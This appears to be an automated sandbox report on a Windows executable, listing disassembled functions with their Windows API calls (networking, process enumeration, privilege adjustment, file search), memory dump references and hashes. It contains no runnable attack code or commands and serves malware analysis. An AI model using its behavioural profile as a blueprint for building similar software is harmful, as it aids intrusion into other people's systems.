                                    • API ID: ErrorLast$bindclosesocketlistensocket
                                    • String ID:
                                    • API String ID: 1279440585-0
                                    • Opcode ID: 549a4d397e21043655f3dce878fb9743951e70f62d37ac93308236cdb88f88f6
                                    • Instruction ID: 7611313a2817a0718ce16b4256fbb2d0509ec017a71d27fc3ae6a37f1aa75bd0
                                    • Opcode Fuzzy Hash: 549a4d397e21043655f3dce878fb9743951e70f62d37ac93308236cdb88f88f6
                                    • Instruction Fuzzy Hash: 9D21D3716002019FCB14FF68DD85BAEB7A9EF59324F108258F916A73D2DB70AE418B61
                                    Function 00176532 Relevance: 9.1, APIs: 6, Instructions: 71processCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00176554
                                    • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00176564
                                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 00176583
                                    • __wsplitpath.LIBCMT ref: 001765A7
                                    • _wcscat.LIBCMT ref: 001765BA
                                    • CloseHandle.KERNEL32(00000000,?,00000000), ref: 001765F9
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                                    • String ID:
                                    • API String ID: 1605983538-0
                                    • Opcode ID: 9b5f3f51d0eaf79d0d2de30f18257a311b7a2740475ed08b4f168dcd1280380f
                                    • Instruction ID: 577521ba03f34d120607329b397574709f83b50157e4cfe2345c5525d66ed5b5
                                    • Opcode Fuzzy Hash: 9b5f3f51d0eaf79d0d2de30f18257a311b7a2740475ed08b4f168dcd1280380f
                                    • Instruction Fuzzy Hash: BE21A471900218ABDB11ABA4DC88FEEB7BCAB19340F5044E9F509E7141EB719F85DB60
                                    Function 00139B60 Relevance: 8.6, Strings: 6, Instructions: 1055COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: ERCP$VUUU$VUUU$VUUU$VUUU$hixjsfhixjsfhixjsbhixjs8hixjs7hixjs0hixjs0hixjs0hixjs0hixjs0hixjs0hixjs0hixjs6hixjs6hixjs8hixjs9hixjs8hixjs5hixjs7hixjschixjsfhixj
                                    • API String ID: 0-863283908
                                    • Opcode ID: 2bbd155b3e061f087be6dd191ea01ae57c5ffbbf96f07bd2d85a966aa664deb1
                                    • Instruction ID: 3a638befdd0c4a19896e79cda47d593f5ae4078e77ac1aac3b155e490806034d
                                    • Opcode Fuzzy Hash: 2bbd155b3e061f087be6dd191ea01ae57c5ffbbf96f07bd2d85a966aa664deb1
                                    • Instruction Fuzzy Hash: 39927C71E0421ACBDF28CF58C8907FDB7B1BF54314F5581AAE856AB280D7B49D81CB91
                                    Function 0018923B Relevance: 7.6, APIs: 5, Instructions: 146networkCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0018A82C: inet_addr.WS2_32(00000000), ref: 0018A84E
                                    • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 00189296
                                    • WSAGetLastError.WS2_32(00000000,00000000), ref: 001892B9
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: ErrorLastinet_addrsocket
                                    • String ID:
                                    • API String ID: 4170576061-0
                                    • Opcode ID: e6a67ea0a48a2d8995a29f68fbeb4afb3c5d2a1bbeb016995b56846c4e3073de
                                    • Instruction ID: 13d8ad6a18d94bfc029dab89fd348fced3fab7a4866acf660f9046cbf794e68b
                                    • Opcode Fuzzy Hash: e6a67ea0a48a2d8995a29f68fbeb4afb3c5d2a1bbeb016995b56846c4e3073de
                                    • Instruction Fuzzy Hash: 4E41CF70600200AFDB14BF68C882E7EB7EDEF54724F148548F956AB292DB749E418BA1
                                    Function 0017EB60 Relevance: 7.6, APIs: 5, Instructions: 125fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • FindFirstFileW.KERNEL32(?,?), ref: 0017EB8A
                                    • _wcscmp.LIBCMT ref: 0017EBBA
                                    • _wcscmp.LIBCMT ref: 0017EBCF
                                    • FindNextFileW.KERNEL32(00000000,?), ref: 0017EBE0
                                    • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0017EC0E
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Find$File_wcscmp$CloseFirstNext
                                    • String ID:
                                    • API String ID: 2387731787-0
                                    • Opcode ID: d08ff7be80b6f3a2fe571852ad939357ec0432259d7334caeb250450efc3b482
                                    • Instruction ID: f1ef7f997cc37b1bf3f4285a53fa4d6a3c79c899bfc45256015bc603e8d6e744
                                    • Opcode Fuzzy Hash: d08ff7be80b6f3a2fe571852ad939357ec0432259d7334caeb250450efc3b482
                                    • Instruction Fuzzy Hash: E441CD356002029FCB08DF28C490EAAB7F4FF59324F10859DF95A8B3A1DB31E980CB91
                                    Function 00198111 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                    • String ID:
                                    • API String ID: 292994002-0
                                    • Opcode ID: 3140a8f95e35f13428c973b794897ee0ecfa9b11dc3d293d2afe67039b12ad14
                                    • Instruction ID: 4d1f79f2856f927afee2bdc04225c2081cb56c5f57794e26ba087b0a54466ad0
                                    • Opcode Fuzzy Hash: 3140a8f95e35f13428c973b794897ee0ecfa9b11dc3d293d2afe67039b12ad14
                                    • Instruction Fuzzy Hash: B111C1317002116FEB252F26EC84E6FBB9DEF56760B050539F84AD7241DF30E94286A4
                                    Function 0019F1D7 Relevance: 6.1, APIs: 4, Instructions: 80nativewindowCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0014B34E: GetWindowLongW.USER32(?,000000EB), ref: 0014B35F
                                    • GetCursorPos.USER32(?), ref: 0019F211
                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,001AE4C0,?,?,?,?,?), ref: 0019F226
                                    • GetCursorPos.USER32(?), ref: 0019F270
                                    • NtdllDialogWndProc_W.NTDLL(?,0000007B,?,?,?,?,?,?,?,?,?,?,001AE4C0,?,?,?), ref: 0019F2A6
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Cursor$DialogLongMenuNtdllPopupProc_TrackWindow
                                    • String ID:
                                    • API String ID: 1423138444-0
                                    • Opcode ID: cf56713d564d1b7899fcf72f3dfd39e1f1ec0140a029e07ef8d855de2c7e1c9b
                                    • Instruction ID: 0db42b7798c8ff5ae94b9cfb8517277fd51844a14e5daf0d931dd6ac6314bae1
                                    • Opcode Fuzzy Hash: cf56713d564d1b7899fcf72f3dfd39e1f1ec0140a029e07ef8d855de2c7e1c9b
                                    • Instruction Fuzzy Hash: FF218039500118FFCF298F95D858EFA7BB9EF09760F044169F9058B2A1D3309992DB50
                                    Function 0014B55D Relevance: 6.1, APIs: 4, Instructions: 56nativeCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0014B34E: GetWindowLongW.USER32(?,000000EB), ref: 0014B35F
                                    • NtdllDialogWndProc_W.NTDLL(?,00000020,?,00000000), ref: 0014B5A5
                                    • GetClientRect.USER32(?,?), ref: 001AE69A
                                    • GetCursorPos.USER32(?), ref: 001AE6A4
                                    • ScreenToClient.USER32(?,?), ref: 001AE6AF
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Client$CursorDialogLongNtdllProc_RectScreenWindow
                                    • String ID:
                                    • API String ID: 1010295502-0
                                    • Opcode ID: 4202036c67bd1358ec71d7c075eb3162c64f7924059d722b48a970ee5ffb0f9e
                                    • Instruction ID: 49a37f59dac37a5185ef5acf06570b3489f67be5dd80cf30dd5792b52fa9c045
                                    • Opcode Fuzzy Hash: 4202036c67bd1358ec71d7c075eb3162c64f7924059d722b48a970ee5ffb0f9e
                                    • Instruction Fuzzy Hash: 9511367590012ABBCB14EF94DD859EEB7B8EB1A304F000851F901E7150E334EA91CBA1
                                    Function 0014B11F Relevance: 4.9, APIs: 3, Instructions: 377nativeCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0014B34E: GetWindowLongW.USER32(?,000000EB), ref: 0014B35F
                                    • NtdllDialogWndProc_W.NTDLL(?,?,?,?,?), ref: 0014B22F
                                      • Part of subcall function 0014B55D: NtdllDialogWndProc_W.NTDLL(?,00000020,?,00000000), ref: 0014B5A5
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: DialogNtdllProc_$LongWindow
                                    • String ID:
                                    • API String ID: 1155049231-0
                                    • Opcode ID: 6fc43915a0923b1b971d19ee4db9f463f6e899665b3380a4cf133b1c731fb4a4
                                    • Instruction ID: e79064a8ba08fd9ebcb1ce06a4e6acec7845dae998bd88c81944e9aa10e05318
                                    • Opcode Fuzzy Hash: 6fc43915a0923b1b971d19ee4db9f463f6e899665b3380a4cf133b1c731fb4a4
                                    • Instruction Fuzzy Hash: ECA1687411C105BADF2CAF2A5CC8EBF29ACEB57750B15412DF402D65B1DBA9EC01D272
                                    Function 00184EB5 Relevance: 4.7, APIs: 3, Instructions: 155networkfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,001843BF,00000000), ref: 00184FA6
                                    • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00184FD2
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Internet$AvailableDataFileQueryRead
                                    • String ID:
                                    • API String ID: 599397726-0
                                    • Opcode ID: d9a400cae7201cb85d143fc18ae7d7330edbed5376d7be5bd620927eb44a5742
                                    • Instruction ID: 58c1e32d9a1b4190564ecf70a9cd30b44f28723d8f6055fcef5be18c6016c32f
                                    • Opcode Fuzzy Hash: d9a400cae7201cb85d143fc18ae7d7330edbed5376d7be5bd620927eb44a5742
                                    • Instruction Fuzzy Hash: DB41F27150460ABFEB20EE94DC85EBFB7ADEB40358F10006EF605A6180EB719F419BA0
                                    Function 0017E1FD Relevance: 4.6, APIs: 3, Instructions: 72COMMON
                                    Download Yara Rule
                                    APIs
                                    • SetErrorMode.KERNEL32(00000001), ref: 0017E20D
                                    • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0017E267
                                    • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0017E2B4
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: ErrorMode$DiskFreeSpace
                                    • String ID:
                                    • API String ID: 1682464887-0
                                    • Opcode ID: 90a4b70972637236e9bc8e5bf871f879ddbbd9da5e750d993bae504cf16f5307
                                    • Instruction ID: 3617c63a82b084c20d5a8ba0d71a85d544ac2439faaab62cd408f6266a9e00cb
                                    • Opcode Fuzzy Hash: 90a4b70972637236e9bc8e5bf871f879ddbbd9da5e750d993bae504cf16f5307
                                    • Instruction Fuzzy Hash: F6213A75A00218EFCB04EFA5D885AADFBF8FF59314F0484A9E909AB252DB319945CB50
                                    Function 0016B134 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0014F4EA: std::exception::exception.LIBCMT ref: 0014F51E
                                      • Part of subcall function 0014F4EA: __CxxThrowException@8.LIBCMT ref: 0014F533
                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0016B180
                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0016B1AD
                                    • GetLastError.KERNEL32 ref: 0016B1BA
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                    • String ID:
                                    • API String ID: 1922334811-0
                                    • Opcode ID: fbf3f3b5536e27c690a43081ed661308d54f554c24987683f45b9d9e5901df7f
                                    • Instruction ID: c1170e319b5db9b400b2ad71514428db6e057bbfa46095fbc1fe92b747982fb2
                                    • Opcode Fuzzy Hash: fbf3f3b5536e27c690a43081ed661308d54f554c24987683f45b9d9e5901df7f
                                    • Instruction Fuzzy Hash: 0E119DB1408205AFE718AF64ECC5D2BB7B8EB44310B20852EE45697250EB70EC818A60
                                    Function 00176606 Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00176623
                                    • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 00176664
                                    • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0017666F
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: CloseControlCreateDeviceFileHandle
                                    • String ID:
                                    • API String ID: 33631002-0
                                    • Opcode ID: 1442298f0317b7c422d3fee54cb0496e0bf72f96fdc2bc347471a05613508c36
                                    • Instruction ID: 3ad88b84f426f6bff4c0bf42ce93aec554b7bc67088e9282b574077e48556f49
                                    • Opcode Fuzzy Hash: 1442298f0317b7c422d3fee54cb0496e0bf72f96fdc2bc347471a05613508c36
                                    • Instruction Fuzzy Hash: A01152B1E01228BFDB148F95DC44BAE7BFCEB45710F108152F904E6290D7B05A018BA1
                                    Function 001771FA Relevance: 4.5, APIs: 3, Instructions: 42memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00177223
                                    • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0017723A
                                    • FreeSid.ADVAPI32(?), ref: 0017724A
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: AllocateCheckFreeInitializeMembershipToken
                                    • String ID:
                                    • API String ID: 3429775523-0
                                    • Opcode ID: ba754581f1400d4af02e79cefb700a5535004a72a72b92dcd3940c9a88ea2e2b
                                    • Instruction ID: 081fd29c55892aaa2f57ba0ff6dd16c1b82f6db865bb824007c232b71af45e7b
                                    • Opcode Fuzzy Hash: ba754581f1400d4af02e79cefb700a5535004a72a72b92dcd3940c9a88ea2e2b
                                    • Instruction Fuzzy Hash: 0BF01D76A04209BFDF04DFE4DD89AEEBBB8EF08201F104569B602E2591E3709A448B10
                                    Function 0014B385 Relevance: 3.1, APIs: 2, Instructions: 82nativeCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0014B34E: GetWindowLongW.USER32(?,000000EB), ref: 0014B35F
                                      • Part of subcall function 0014B526: GetWindowLongW.USER32(?,000000EB), ref: 0014B537
                                    • GetParent.USER32(?), ref: 001AE5B2
                                    • NtdllDialogWndProc_W.NTDLL(?,00000133,?,?,?,?,?,?,?,?,0014B1E8,?,?,?,00000006,?), ref: 001AE62C
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: LongWindow$DialogNtdllParentProc_
                                    • String ID:
                                    • API String ID: 314495775-0
                                    • Opcode ID: 16128099aa6c480b779d06db5b68e71a2f5521f6c577060cc7641e97895952fc
                                    • Instruction ID: 2cf85a0f557da47a3daad13413f1632b1b4ad96e8e63e7b8f36425c49cbfcf51
                                    • Opcode Fuzzy Hash: 16128099aa6c480b779d06db5b68e71a2f5521f6c577060cc7641e97895952fc
                                    • Instruction Fuzzy Hash: A4218238605104AFCB288F2DD9C59B93BA6BB4A334F184252F6195B2F2D770DD51DB10
                                    Function 0017F56F Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • FindFirstFileW.KERNEL32(?,?), ref: 0017F599
                                    • FindClose.KERNEL32(00000000), ref: 0017F5C9
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
